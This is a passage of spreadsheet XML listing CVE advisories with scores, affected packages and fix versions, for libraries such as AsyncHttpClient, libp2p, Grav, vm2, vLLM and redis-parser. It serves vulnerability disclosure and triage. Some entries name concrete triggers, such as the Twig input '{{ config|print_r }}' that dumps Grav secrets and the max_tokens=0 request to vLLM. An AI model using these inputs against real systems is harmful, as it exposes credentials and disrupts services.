        </is>
      </c>
      <c r="D184" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E184" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F184" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G184" s="5" t="inlineStr"/>
      <c r="H184" s="5" t="inlineStr"/>
      <c r="I184" s="5" t="inlineStr"/>
      <c r="J184" s="5" t="inlineStr"/>
      <c r="K184" s="5" t="inlineStr"/>
      <c r="L184" s="5" t="inlineStr"/>
      <c r="M184" s="5" t="inlineStr"/>
      <c r="N184" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P184" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q184" s="5" t="inlineStr"/>
      <c r="R184" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="S184" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.1.0 until 2.16.1 and 3.0.12, requests using an authenticated SOCKS proxy can expose the proxy's credentials to the origin because NettyRequestFactory and NettyRequestSender attach Proxy-Authorization without confirming that the request is being sent to an HTTP proxy. With preemptive proxy authentication, the header is attached to a plaintext HTTP request, exposing credentials such as directly reversible Basic credentials to the origin. With the default non-preemptive flow, a hostile origin can return a 407 response and ProxyUnauthorized407Interceptor sends the proxy credentials through the existing SOCKS tunnel, including NTLM, Kerberos, and SPNEGO credentials. Releases before 2.1.0 lack SOCKS proxy support. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T184" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85719</t>
        </is>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B185" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C185" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85721</t>
        </is>
      </c>
      <c r="D185" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E185" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F185" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G185" s="5" t="inlineStr"/>
      <c r="H185" s="5" t="inlineStr"/>
      <c r="I185" s="5" t="inlineStr"/>
      <c r="J185" s="5" t="inlineStr"/>
      <c r="K185" s="5" t="inlineStr"/>
      <c r="L185" s="5" t="inlineStr">
        <is>
          <t>maven:org.asynchttpclient:async-http-client</t>
        </is>
      </c>
      <c r="M185" s="5" t="inlineStr">
        <is>
          <t>2.16.1, 3.0.12</t>
        </is>
      </c>
      <c r="N185" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P185" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q185" s="5" t="inlineStr"/>
      <c r="R185" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-409</t>
        </is>
      </c>
      <c r="S185" s="5" t="inlineStr">
        <is>
          <t>The AsyncHttpClient (AHC) library allows Java applications to easily execute HTTP requests and asynchronously process HTTP responses. From 2.0.0 until 2.16.1 and 3.0.12, automatic response decompression on the HTTP/1.1 path uses ChannelManager.newHttpContentDecompressor() to install Http1ContentDecompressor without a cumulative output-size limit. A hostile or compromised server, or an attacker who can alter a response in transit, can send a small gzip, deflate, or snappy response that expands across chunks until the client exhausts its heap and raises OutOfMemoryError; brotli and zstd are also affected when their optional codecs are present. In versions 3.0.8 through 3.0.10, the HTTP/2 decompressor is also unbounded, so switching protocols does not mitigate the issue on those releases. A limit applied to each decode call is insufficient because the response can be delivered as many small chunks, so the fixed implementation tracks total decompressed bytes for the whole response. This issue is fixed in versions 2.16.1 and 3.0.12.</t>
        </is>
      </c>
      <c r="T185" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85721</t>
        </is>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B186" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C186" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85917</t>
        </is>
      </c>
      <c r="D186" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E186" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G186" s="5" t="inlineStr"/>
      <c r="H186" s="5" t="inlineStr"/>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr"/>
      <c r="K186" s="5" t="inlineStr"/>
      <c r="L186" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Server-side request forgery (ssrf) in Azure AI Foundry allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85917</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86038</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="inlineStr"/>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr">
        <is>
          <t>npm:@libp2p/gossipsub</t>
        </is>
      </c>
      <c r="M187" s="5" t="inlineStr">
        <is>
          <t>16.0.5</t>
        </is>
      </c>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-347</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. From 15.0.0 until 16.0.5, @libp2p/gossipsub uses the default StrictSign policy in packages/gossipsub/src/utils/buildRawMessage.ts, where validateToRawMessage verifies a signature with attacker-controlled msg.key but skips binding that key to msg.from when the claimed author is an RSA peer ID that does not inline a public key. An unauthenticated attacker can place a victim RSA peer ID in msg.from, sign the message with the attacker's private key, and supply the attacker's public key in msg.key, causing the message to be accepted and propagated as authored by the victim. Applications that trust message.from for validators, authorization, accounting, moderation, reputation, or audit logging can process attacker-controlled data under false origin attribution. The issue is fixed in version 16.0.5.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86038</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86040</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="inlineStr"/>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-770</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>libp2p is a JavaScript implementation of the libp2p networking stack. Prior to 11.0.26, @libp2p/floodsub accepts unauthenticated RPC frames on /floodsub/1.0.0 through PeerStreams.attachInboundStream in packages/floodsub/src/peer-streams.ts without protobuf element limits, then processRpc and processRpcSubOpt in packages/floodsub/src/floodsub.ts synchronously process the subscriptions array without a per-frame cap. A single bounded-size frame can decode into millions of empty subscription entries that block the event loop, while hundreds of thousands of unique-topic SUBSCRIBE entries allocate PeerSet objects in this.topics that are not removed after peer removal or stop. Empty entries cause CPU exhaustion but do not grow this.topics; persistent memory growth requires unique topics. The subscription path bypasses message signature validation and the message-only processing queue, allowing a remote peer to cause sustained CPU denial of service, memory exhaustion, out-of-memory termination, and node unavailability. The issue is fixed in version 11.0.26.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86040</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87742</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="inlineStr"/>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr"/>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in quarkus-websockets-next. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by streaming messages over a single connection faster than the application can process them. Due to unbounded message buffering and a lack of read backpressure, this rapidly exhausts heap space, leading to a java.lang.OutOfMemoryError that crashes the Java Virtual Machine (JVM).</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87742</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92916</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="inlineStr"/>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr"/>
      <c r="K190" s="5" t="inlineStr"/>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In Grav 1.7.0 through 1.7.53.2 and 2.0.0 through 2.0.21, when the debugger is enabled (system.debugger.enabled: true, which is not the default), the Clockwork profiler endpoint is exposed without authentication: InitializeProcessor::handleDebuggerRequest() intercepts any path containing /__clockwork/ during bootstrap and passes it to Debugger::debuggerRequest(), which performs no user lookup, IP restriction, or Clockwork authenticator check, and also supports anonymous pagination over the entire stored history. With the shipped censored: false default, each stored record contains raw request cookies (including Grav's session cookie, whose value is the PHP session id, allowing an attacker to resume another user's session, including an authenticated admin's), the full parsed request body (Grav's login form posts data[username]/data[password], so passwords are stored in plaintext because Clockwork's password filter only inspects top-level keys), and the site's entire system and plugin configuration, including operator-saved secrets such as SMTP credentials, third-party API keys, and licence keys. Authorization and X-API-Token headers are stored even when censored: true. On Grav 2.0, setting provider: debugbar does not avoid the issue because Grav forces the Clockwork provider for requests preferring a JSON response. The issue is fixed in 1.7.53.4 and 2.0.22, which restrict /__clockwork/ to server-local requests or requests presenting the new system.debugger.token secret and strip cookies and credential headers from stored records. Workarounds include setting debugger.enabled: false or blocking /__clockwork/ at the web server or CDN.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92916</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92917</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="inlineStr"/>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Grav is a flat-file CMS. In versions 2.0.0-rc.1 through 2.0.21, the Twig content sandbox fails to restrict the dump and serialize filters (print_r, vardump, json_encode, yaml_encode, string): GravExtension::assertSandboxDumpSafe() determines sandbox state by calling SandboxExtension::isSandboxed() without a Source argument, which reports only the global sandbox flag that Grav never enables, so the guard added in GHSA-mc5q-6hpj-rp7j never executes. As a result, an authenticated user with page-edit rights can render {{ config|print_r }} in page content with Twig processing enabled and dump Grav's entire merged configuration — print_r reflects the real Config object held in a private property of the SandboxConfig facade, bypassing its path redaction — exposing plugin secrets such as SMTP credentials, API tokens, webhook secrets and cache backend passwords. Grav 1.7 is not affected because it ships no Twig content sandbox. The issue is fixed in 2.0.22, where the affected filters are registered with Twig's needs_is_sandboxed flag.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92917</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92942</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="inlineStr"/>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.7 (affected versions &lt;= 3.11.6) does not enforce the VM({ timeout }) option on code executed outside the synchronous VM#run() call. The timeout only wraps the single call to _runScript() via doWithTimeout() in lib/vm.js, and FinalizationRegistry and WeakRef are exposed to sandboxed code unmodified (they are not among the hardened globals in lib/setup-sandbox.js). Sandboxed code can register a FinalizationRegistry cleanup callback against an object and then drop the only strong reference to it; vm.run() returns within the configured timeout, but when the V8 garbage collector later reclaims the object it invokes the sandboxed cleanup callback outside any vm2 timeout accounting. A busy loop in that callback blocks the host event loop for an unbounded period, resulting in denial of service. The time of invocation depends on the garbage collector (e.g. under memory pressure or with --expose-gc).</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92942</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92961</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="inlineStr"/>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.6 fails to enforce bufferAllocLimit on ArrayBuffer, SharedArrayBuffer, and TypedArray constructors, allowing attackers to allocate arbitrary host memory. Attackers can bypass the buffer allocation cap by using these V8 intrinsics to exhaust host process memory and trigger out-of-memory conditions.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92961</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92983</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="inlineStr"/>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-772</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>InternLM LMDeploy through 0.17.0 in DistServe prefill/decode disaggregation mode fails to release scheduler sessions because the proxy uses user-facing session IDs instead of internal scheduler keys. Unauthenticated attackers can send completion requests to the proxy endpoint that accumulate unreleased scheduler metadata and memory until the prefill worker is out-of-memory killed.</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92983</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93435</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="inlineStr"/>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>redis-parser through 3.0.0 contains a denial of service vulnerability in the RESP protocol parser that allows malicious Redis endpoints to crash the client process through unbounded recursion on nested arrays. Attackers can send crafted RESP byte streams with repeated array headers that exhaust the V8 call stack, causing an uncaught RangeError that terminates the Node.js process without triggering error handling callbacks.</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93435</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93436</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="inlineStr"/>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>vLLM through 0.29.0 fails to properly clean up decode-side metadata for rejected inference requests in prefill/decode disaggregated deployments. Remote attackers can submit requests with max_tokens=0 to exhaust decode-worker memory without bound until the worker restarts.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93436</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24081</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="inlineStr"/>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr"/>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-126</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Transient DOS when processing a channel map with insufficient used channels and adaptive frequency hopping is fully enabled.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24081</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25281</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>product-security@qualcomm.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="inlineStr"/>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr"/>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
